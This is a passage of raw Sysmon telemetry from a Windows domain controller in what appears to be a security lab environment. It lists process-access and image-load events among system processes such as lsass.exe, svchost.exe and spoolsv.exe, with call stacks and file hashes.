Corporationrdpclip.exerdpclipC:\Windows\system32\ATTACKRANGE\Administrator{266CAFBE-64C3-6064-2804-0B0000000000}0xb04282HighMD5=D887E718FB0F4C99B9F01C5BD59F8B90,SHA256=ACFA1128B4EDD953F6364FA6216337A59C0522A01349263A11259A827838A56F,IMPHASH=5A464814303942D42A66B561CF697F26{266CAFBE-646C-6064-0F00-00000000AE01}1116C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k termsvcs 734700x80000000000000004381Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.949{266CAFBE-64C3-6064-9800-00000000AE01}4824C:\Windows\System32\efsui.exeC:\Windows\System32\cryptdll.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptography ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptdll.dllMD5=4B31902F1E0B79CE7E46D9877647C1CC,SHA256=8925892119315293C49D09A26191149660934BF1E5D3D023722E90339ADA38AA,IMPHASH=CAB6D6025DF08B0D0BC6259D625E2778trueMicrosoft WindowsValid 23542300x80000000000000004380Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.949{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D5B25676CB0F5A0BE3DD45E36CC36C0C,SHA256=DFD36D0B32AA60B10A5126933FB9A7C2C9FE7C0510D94B191C2894E139EA2BD3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000004379Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:11.949{266CAFBE-646A-6064-0B00-00000000AE01}856976C:\Windows\system32\lsass.exe{266CAFBE-64C3-6064-9800-00000000AE01}4824C:\Windows\system32\efsui.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004378Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.949{266CAFBE-646A-6064-0B00-00000000AE01}856976C:\Windows\system32\lsass.exe{266CAFBE-64C3-6064-9800-00000000AE01}4824C:\Windows\system32\efsui.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004377Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:11.933{266CAFBE-646C-6064-1000-00000000AE01}11242344C:\Windows\system32\svchost.exe{266CAFBE-64C3-6064-9800-00000000AE01}4824C:\Windows\system32\efsui.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004376Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.933{266CAFBE-646C-6064-1000-00000000AE01}11241624C:\Windows\system32\svchost.exe{266CAFBE-64C3-6064-9800-00000000AE01}4824C:\Windows\system32\efsui.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004375Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:11.933{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-0F00-00000000AE01}1116C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+f290|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000004374Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.918{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C3-6064-9900-00000000AE01}2752C:\Windows\system32\TSTheme.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x80000000000000004373Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.918{266CAFBE-646C-6064-1000-00000000AE01}11242344C:\Windows\system32\svchost.exe{266CAFBE-64C3-6064-9900-00000000AE01}2752C:\Windows\system32\TSTheme.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004372Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.918{266CAFBE-646C-6064-1000-00000000AE01}11241624C:\Windows\system32\svchost.exe{266CAFBE-64C3-6064-9900-00000000AE01}2752C:\Windows\system32\TSTheme.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004371Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:11.918{266CAFBE-647C-6064-2B00-00000000AE01}25362900C:\Windows\System32\spoolsv.exe{266CAFBE-646C-6064-1300-00000000AE01}1228C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\spoolsv.exe+1b0d3|C:\Windows\System32\spoolsv.exe+1af39|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bfb|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004370Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.902{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1300-00000000AE01}1228C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+773d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004369Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:11.902{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1300-00000000AE01}1228C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004368Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.902{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1300-00000000AE01}1228C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+7f5d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004367Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:11.902{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1300-00000000AE01}1228C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004366Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.902{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1300-00000000AE01}1228C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004365Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:11.902{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1300-00000000AE01}1228C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|c:\windows\system32\lsm.dll+23c29|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004364Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.902{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1300-00000000AE01}1228C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+23c18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004363Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:11.902{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1300-00000000AE01}1228C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|c:\windows\system32\lsm.dll+1fc37|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004362Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.902{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1300-00000000AE01}1228C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1fb39|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004361Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:11.902{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647C-6064-2B00-00000000AE01}2536C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+6668|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004360Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.902{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647C-6064-2B00-00000000AE01}2536C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+6668|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004359Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:11.902{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647C-6064-2B00-00000000AE01}2536C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004358Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.902{266CAFBE-64C1-6064-9100-00000000AE01}51083828C:\Windows\system32\csrss.exe{266CAFBE-64C3-6064-9900-00000000AE01}2752C:\Windows\system32\TSTheme.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000004357Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:11.902{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004356Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.902{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004355Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:11.902{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C: